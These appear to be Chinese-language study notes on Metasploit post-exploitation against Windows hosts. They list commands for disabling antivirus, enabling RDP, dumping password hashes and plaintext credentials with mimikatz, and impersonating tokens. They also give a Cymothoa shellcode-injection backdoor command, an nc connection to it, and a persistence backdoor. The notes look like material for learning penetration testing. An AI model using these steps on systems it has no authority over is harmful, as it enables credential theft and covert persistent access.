MSF学习第三天
Ps查看系统进程:
自动进程迁移:post/windows/manage/migrate
查看系统信息:sysinfo
查看系统是否运行在虚拟机:post/windows/gather/checkvm
查看系统最近运行时间:idletime
查看完整网络设置:route
Getuid:查看当前权限
关闭杀毒软件:post/windows/manage/killav
开启远程登录:post/windows/manage/enable_rdp
枚举登录用户:post/windows/gather/enum_logged_on_users
列举已经安装的的应用:post/windows/gather/enum_applications
查看是否设置自动登录,并抓取密码:
Load espia :加载插件
Screengrab获取当前屏幕截屏:
关于摄像头:webcam_list webcam_stream
令牌假冒:
首先查看当前权限
首先加载incognito模块:
列出可用令牌:
一共两类令牌:
Delegation Tokens:授权令牌,它支持交互登录
Impersonation Tokens:模拟令牌,是非交互的会话。
关于令牌数量最终取决于meterpreter shell的访问级别。(本例中采用管理员运行)
冒用令牌:
注意hostname\username (中间要两个反斜杠)
Hash攻击:
Hashmap抓取密码:
Hashmap meterpreter脚本可以从目标机器中提取hash值,但是在非system权限下运行hashmap会失败,所以需要系统级的权限才能获取sam中的hash
更加智能的smart_hashdump
如果你是administrator用户,可以尝试通过getsystem命令获取系统级权限:
成功读取到hash值
Mimikatz抓取密码:
对于mimikatz最佳试用32位系统,如果是64位系统,直接使用mimikatz之后meterpreter会加载一个32位的mimikatz到内存,使得很多功能无效。而且64位系统下必须查看进程列表然后在加载mimikatz之前将进程迁移到一个64位进程才能查看系统密码明文。
是一个64位平台:
首先找一个64位进程:
然后进程迁移:
高权限迁低权限权限丢失了。。。。
重新获取shell,然后再重复上述步骤:
加载mimikatz模块,查看可用mimikatz全部模块:
我们可以使用“::”语法请求某个模块的可用选项,选定一个模块后也可以用”::”查看本模块帮助:
查看hash模块的可用模块:
我们知道mimikatz的用法之后可以使用metasploit内建的命令,也可以使用Mimikatz自带的命令从目标机器上导出hash和明文证书:
使用msv命令抓取系统hash:
获取系统票据:kerberos
Widgest可以获取系统账户信息:
通过错误模块加载mimikatz可用模块:
查看samdump模块用法;Dump 全部hash值:
Mimikatz还可以通过service,process等其他模块操作系统服务,系统进程
后渗透测试之后门:
Cymothoa后门:可以将shellcode注入到现有进程的后门工具,反弹的是相应注入进程的权限,进程关闭后门关闭。
查看shellcode:
需要把Cymothoa可执行程序复制到目标主机,然后通过命令:cymothoa -p pid -s 1 -y 4444注入shellcode
攻击机通过:nc -nvv 目标ip port 即可连接。
Persistence后门:自启动的持久性后门
查看帮助:
创建后门:重新启动msf,会后门程序会自动重新发起连接: